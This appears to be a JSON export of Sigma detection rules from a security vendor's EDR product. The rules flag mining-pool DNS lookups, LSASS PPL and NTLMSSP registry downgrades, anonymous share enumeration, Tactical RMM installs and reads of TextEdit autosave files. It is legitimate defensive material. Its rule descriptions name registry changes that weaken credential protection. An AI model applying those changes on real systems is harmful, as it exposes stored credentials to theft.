"content": "title: DNS Request to Cryptocurrency Mining Pool (Linux)\nid: ebcc3c72-c1f1-476c-b665-6fd18b618287\ndescription: |\n Detects a DNS resolution request for a known cryptocurrency mining pool website.\n A mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\n This may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\n It is recommended to investigate the process performing this request to determine its legitimacy.\nreferences:\n - https://www.malwarebytes.com/cryptojacking\n - https://attack.mitre.org/techniques/T1496/\ndate: 2023/12/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CryptoMiner\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '2miners.com'\n - '6block.com'\n - 'acepool.top'\n - 'aionpool.tech'\n - 'alph-pool.com'\n - 'backend-aplha.com'\n - 'baikalmine.com'\n - 'blocx.zone'\n - 'bluenose.link'\n - 'bohemianpool.com'\n - 'c3pool.com'\n - 'cedric-crispin.com'\n - 'cryptonote.social'\n - 'crypto-pool.fr'\n - 'dxpool.net'\n - 'educu.xyz'\n - 'ekapool.com'\n - 'ethashpool.com'\n - 'ethermine.org'\n - 'ethwmine.com'\n - 'ezil.me'\n - 'f2pool.com'\n - 'fairhash.org'\n - 'fastpool.xyz'\n - 'flockpool.com'\n - 'fluxpools.net'\n - 'gntl.uk'\n - 'grinmint.com'\n - 'hashcity.org'\n - 'hashvault.pro'\n - 'herominers.com'\n - 'hiveon.com'\n - 'hiveon.net'\n - 'minerno.de'\n - 'minexmr.com'\n - 'miningmadness.com'\n - 'miningocean.org'\n - 'monerod.org'\n - 'monerohash.com'\n - 'moneroocean.stream'\n - 'monerop.com'\n - 'multi-pools.com'\n - 'nanopool.org'\n - 'nicehash.com'\n - 'p2pool.io'\n - 'pool2mine.net'\n - 'pool.binance.com'\n - 'poolin.com'\n - 'pool.kryptex.com'\n - 'pool.sero.cash'\n - 'pool.xmr.pt'\n - 'prohashing.com'\n - 'raptoreum.zone'\n - 'raptorhash.com'\n - 'ravenminer.com'\n - 'rplant.xyz'\n - 'semipool.com'\n - 'skypool.org'\n - 'solopool.org'\n - 'sunpool.top'\n - 'supportxmr.com'\n - 'suprnova.cc'\n - 'unmineable.com'\n - 'uupool.cn'\n - 'volt-mine.com'\n - 'woolypooly.com'\n - 'xmrpool.eu'\n - 'zergpool.com'\n - 'zeropool.io'\n - 'zpool.ca'\n\n filter_resolver:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n\n filter_browser:\n ProcessImage|endswith:\n - '/firefox'\n - '/chrome'\n - '/google-chrome'\n - '/google-chrome-stable'\n - '/brave'\n - '/msedge'\n - '/librewolf'\n - '/chromium'\n - '/vivaldi'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebcc3c72-c1f1-476c-b665-6fd18b618287",
"rule_name": "DNS Request to Cryptocurrency Mining Pool (Linux)",
"rule_description": "Detects a DNS resolution request for a known cryptocurrency mining pool website.\nA mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\nThis may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\nIt is recommended to investigate the process performing this request to determine its legitimacy.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebcf7c10-b156-46b3-bc22-9c7999c0259a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621269Z",
"creation_date": "2026-03-23T11:45:34.621271Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/005/",
"https://attack.mitre.org/mitigations/M1025/"
],
"name": "t1547_005_lsass_ppl_security_downgrade.yml",
"content": "title: LSASS PPL Downgraded\nid: ebcf7c10-b156-46b3-bc22-9c7999c0259a\ndescription: |\n Detects the weakening of the LSASS PPL (Protected Process Light) configuration.\n A PPL process is a process that, through its signature, is inherently trusted by the system and therefore (if enabled) confered a higher level of security by Windows.\n Protected Process are ranked by trust level and cannot be opened or tampered with by processes with a lower trust level.\n On Windows, the LSASS (Local Security Authority Subsystem Service), which holds sensitive authentication material in its memory, can be optionally configured to run as PPL to prevent attackers from dumping its memory.\n Attackers may try to weaken this security configuration to allow themselves to fetch sensitive data from LSASS' memory.\n It is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as to look for other alerts following this one indicating a dump of the LSASS process memory.\nreferences:\n - https://attack.mitre.org/techniques/T1547/005/\n - https://attack.mitre.org/mitigations/M1025/\ndate: 2020/09/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.005\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_target:\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RunAsPPL'\n\n selection_write_false:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n\n selection_delete_value:\n EventType: 'DeleteValue'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_healthservice:\n ProcessImage: '?:\\Windows\\System32\\SecurityHealthService.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n Image: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_omadmclient:\n Image: '?:\\WINDOWS\\system32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection_target and (selection_write_false or selection_delete_value) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebcf7c10-b156-46b3-bc22-9c7999c0259a",
"rule_name": "LSASS PPL Downgraded",
"rule_description": "Detects the weakening of the LSASS PPL (Protected Process Light) configuration.\nA PPL process is a process that, through its signature, is inherently trusted by the system and therefore (if enabled) confered a higher level of security by Windows.\nProtected Process are ranked by trust level and cannot be opened or tampered with by processes with a lower trust level.\nOn Windows, the LSASS (Local Security Authority Subsystem Service), which holds sensitive authentication material in its memory, can be optionally configured to run as PPL to prevent attackers from dumping its memory.\nAttackers may try to weaken this security configuration to allow themselves to fetch sensitive data from LSASS' memory.\nIt is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as to look for other alerts following this one indicating a dump of the LSASS process memory.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebd472da-418b-4126-873b-e921337be4d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622259Z",
"creation_date": "2026-03-23T11:45:34.622261Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622265Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1021_001_restrictanonymous_key_in_registry.yml",
"content": "title: Share Enumeration Security Lowered in Registry\nid: ebd472da-418b-4126-873b-e921337be4d2\ndescription: |\n Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all network shares.\n Attackers can use this technique to allow all machine users to enumerate devices and perform lateralization through RDP.\n It is recommended to investigate the process performing this action to determine its legitimacy and to look for other malicious actions.\nreferences:\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.discovery\n - attack.t1135\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RestrictAnonymous'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage:\n - '?:\\Windows\\system32\\svchost.exe'\n - '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_trendmicro1:\n ProcessImage:\n - '?:\\Program Files (x86)\\Trend Micro\\Security Agent\\TSC64.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\OfficeScan Client\\TSC64.exe'\n exclusion_trendmicro2:\n ProcessImage: '?:\\WINDOWS\\RegBootClean64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebd472da-418b-4126-873b-e921337be4d2",
"rule_name": "Share Enumeration Security Lowered in Registry",
"rule_description": "Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all network shares.\nAttackers can use this technique to allow all machine users to enumerate devices and perform lateralization through RDP.\nIt is recommended to investigate the process performing this action to determine its legitimacy and to look for other malicious actions.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1071",
"attack.t1112",
"attack.t1135",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebe370ee-bbfc-40ed-b1f3-67d8f45c006a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621128Z",
"creation_date": "2026-03-23T11:45:34.621130Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621135Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-security/enable-ntlm-2-authentication",
"https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_ntlmssp_security_downgrade.yml",
"content": "title: NTLMSSP Security Downgraded\nid: ebe370ee-bbfc-40ed-b1f3-67d8f45c006a\ndescription: |\n Detects the downgrade of the NTLMSSP configuration in the Windows registry.\n The modification of NtlmMinClientSec registry value to 0 disables all security mechanism for NTLM.\n This weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-security/enable-ntlm-2-authentication\n - https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/06/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\NtlmMinClientSec'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\NtlmMinServerSec'\n Details: 'DWORD (0x00000000)'\n ProcessParentImage|contains: '?'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebe370ee-bbfc-40ed-b1f3-67d8f45c006a",
"rule_name": "NTLMSSP Security Downgraded",
"rule_description": "Detects the downgrade of the NTLMSSP configuration in the Windows registry.\nThe modification of NtlmMinClientSec registry value to 0 disables all security mechanism for NTLM.\nThis weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebf78829-39f1-4f5b-8c36-373e3dcca110",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082833Z",
"creation_date": "2026-03-23T11:45:34.082836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082840Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_tacticalrmm_agent_installed.yml",
"content": "title: Tactical RMM Agent Installed\nid: ebf78829-39f1-4f5b-8c36-373e3dcca110\ndescription: |\n Detects the installation of Tactical RMM agent.\n Tactical RMM is a remote desktop software that allows users to access and control computers remotely.\n This tool is frequently used by ransomware groups to gain remote access on system.\n It is recommended to verify if the usage of this tool is legitimate and to verify the legitimacy of the control domain (the API URL used on command-line during installation) to ensure the agent is communicating with an authorized Tactical RMM server.\nreferences:\n - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/08/06\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.AnyDesk\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - ' -m install --api '\n - ' --client-id '\n - ' --auth '\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebf78829-39f1-4f5b-8c36-373e3dcca110",
"rule_name": "Tactical RMM Agent Installed",
"rule_description": "Detects the installation of Tactical RMM agent.\nTactical RMM is a remote desktop software that allows users to access and control computers remotely.\nThis tool is frequently used by ransomware groups to gain remote access on system.\nIt is recommended to verify if the usage of this tool is legitimate and to verify the legitimacy of the control domain (the API URL used on command-line during installation) to ensure the agent is communicating with an authorized Tactical RMM server.\n",
"rule_creation_date": "2025-08-06",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec2971ff-f461-448f-b31a-78f6ddee6cca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099158Z",
"creation_date": "2026-03-23T11:45:34.099167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099171Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_textedit_autosave.yml",
"content": "title: Suspicious Read Access to TextEdit Autosave Files\nid: ec2971ff-f461-448f-b31a-78f6ddee6cca\ndescription: |\n Detects a process reading TextEdit autosave files.\n Adversaries may target autosaved files on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Containers/com.apple.TextEdit/Data/Library/Autosave Information/'\n ProcessImage|contains: '?'\n\n filter_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n filter_spotlight:\n Image: '/System/Library/Frameworks/CoreSpotlight.framework/spotlightknowledged'\n\n exclusion_QuickLookThumbnailing:\n Image: '/System/Library/Frameworks/QuickLookThumbnailing.framework/Versions/A/PlugIns/ThumbnailExtension_macOS.appex/Contents/MacOS/ThumbnailExtension_macOS'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec2971ff-f461-448f-b31a-78f6ddee6cca",
"rule_name": "Suspicious Read Access to TextEdit Autosave Files",
"rule_description": "Detects a process reading TextEdit autosave files.\nAdversaries may target autosaved files on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
